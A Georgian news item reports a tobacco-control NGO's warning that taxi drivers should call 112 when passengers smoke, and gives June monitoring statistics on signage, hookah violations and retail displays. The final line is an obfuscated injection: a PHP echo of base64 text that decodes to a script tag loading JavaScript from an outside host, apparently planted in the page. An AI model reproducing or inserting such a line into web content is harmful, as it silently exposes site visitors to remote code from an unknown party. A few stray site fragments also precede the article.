celsiusi
ავერსი საქკაბელი
არასამთავრობო ორგანიზაცია „თამბაქოს კონტროლის ჩარჩო კონვენციის იმპლემენტაციისა და მონიტორინგის ცენტრი საქართველოში“, რომელიც თამბაქოს კონტროლის კანონის აღსრულების მონიტორინგს ატარებს, ტაქსის მძღოლებს აფრთხილებს. ორგანიზაცია მძღოლებს მიმართავს, ნებისმიერი მძღოლი დაუყოვნებლივ დაუკავშირდეს 112-ს, თუ მგზავრი თამბაქოს მოხმარების წესს დაარღვევს.
 
„ბოლო დროს, განსაკუთრებით რაიონებში, ხშირად, არამწეველი მძღოლი მგზავრის მიერ კანონის დარღვევის გამო ისჯება. ზოგიერთი მოქალაქე კვლავაც კატეგორიულად მოითხოვს, ავტომობილის სალონში მოაწევინონ. არ ითვალისწინებენ მძღოლის შენიშვნას ან თხოვნას. მძღოლი, რომელიც ამ დროს 112-ზე იმ იმედით არ რეკავს, რომ მგზავრი მალე ჩავა, უმეტესად მონიტორის, ან საპატრულო პოლიციის თვალთახედვის არეში ხვდება და ჯარიმდება. არ დაგემორჩილათ მგზავრი? დარეკეთ, ან მოკლე ტექსტური შეტყობინება გაგზავნეთ 112-ზე. ამ შემთხვევაში დაჯარიმდება მხოლოდ მგზავრი. ფიქსირდება შემთხვევები, როდესაც მწეველის ჩასვლის შემდეგ ჩამჯდარმა ახალმა მგზავრმა სუნის გამო იჩივლა. ამიტომაც, მოვუწოდებთ ყველა მძღოლს, ნუ გამოცდით ბედს, დარეკეთ 112-ზე და აიცილეთ ჯარიმა. ივნისის თვეში ტაქსის მძღოლების მხრიდან მხოლოდ ერთი გამოძახება დაფიქსირდა. თბილისში, მძღოლმა ორი ახალგაზრდა ქალბატონი მანქანიდან იძულებით ჩაუშვა. მათ სიგარეტს მოუკიდეს და ჩასვლისას, სამაგიეროს გადახდის მიზნით, უკანა სავარძელზე დაყარეს, რითაც სავარძლის ქსოვილი მოგვიანებით აალდა“, – აღნიშნულია „თამბაქოს კონტროლის ჩარჩო კონვენციის იმპლემენტაციისა და მონიტორინგის ცენტრის“ განცხადებაში.
 
მათივე ცნობით, თამბაქოს მოხმარების კონტროლის გაძლიერების მიზნით, ჯანმრთელობის ხელშეწყობის სახელმწიფო პროგრამის ფარგლებში ყოველთვიურად ტარდება კვლევა.
 
„არამხოლოდ დარღვევის ფაქტები მოწმდება, იმართება საინფორმაციო კამპანია და სასწავლო ტრენინგები აღმასრულებლებისთვის.
 
ივნისის თვის მონაცემებით, მცირე, მაგრამ ორგანიზაციების (შემოწმებული 709 ობიექტი) ნაწილი კვალავაც არ ცნობს ორგანიზაციის შესასვლელ კარზე და შიდა სივრცეში მოწევის აკრძალვის მაუწყებელი სტიკერების განთავსების ვალდებულებას. დაწესებულებების მხოლოდ 61,9%-ში შესასვლელ კარზე გაკრულია მოწევის აკრძალვის აღმნიშვნელი ნიშნები.დაწესებულებების 52,5%-ში შენობის შიგნით გაკრულია მოწევის აკრძალვის აღმნიშვნელი ნიშნები.
 
მონიტორებმა 112-ის მობილური აპლიკაციით აღმასრულებელი გამოიძახეს დარღვევებზე, რომლებიც ე.წ. სამასპინძლო ბიზნესის ობიექტებზე დაფიქსირდა თბილისსა და მარნეულში. ძირითადად, კანონი ჩილიმის არასწორი მოხმარების ფაქტებზე ირღვევა.
 
თამბაქოს ნაწარმის ვაჭრობის ქსელის მონიტორინგის შედეგად (529 დაწესებულებაში), ძირითადად კვლავ სავაჭრო ობიექტის შიგნით თამბაქოს პროდუქტების ხილულად განთავსების წესი ირღვევა. თამბაქოს ნაწარმი ხილულად განთავსებულია ობიექტების 17,0%-ში.
 
მაქსიმალურად შემცირდა სავაჭრო ობიექტების გარე ფასადებზე თამბაქოს პროდუქტების რეკლამის ფაქტები. მეტწილად კვლავ ფიქსირდება თუთუნის რეკლამა“, – ნათქვამია „თამბაქოს კონტროლის ჩარჩო კონვენციის იმპლემენტაციისა და მონიტორინგის ცენტრის“ განცხადებაში.
 
მათივე ცნობით, ივნისის თვეში სავაჭრო ობიექტის შიგნით თამბაქოს რეკლამები და პრომოაქციები საანგარიშო პერიოდში არ დაფიქსირებულა.
527
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");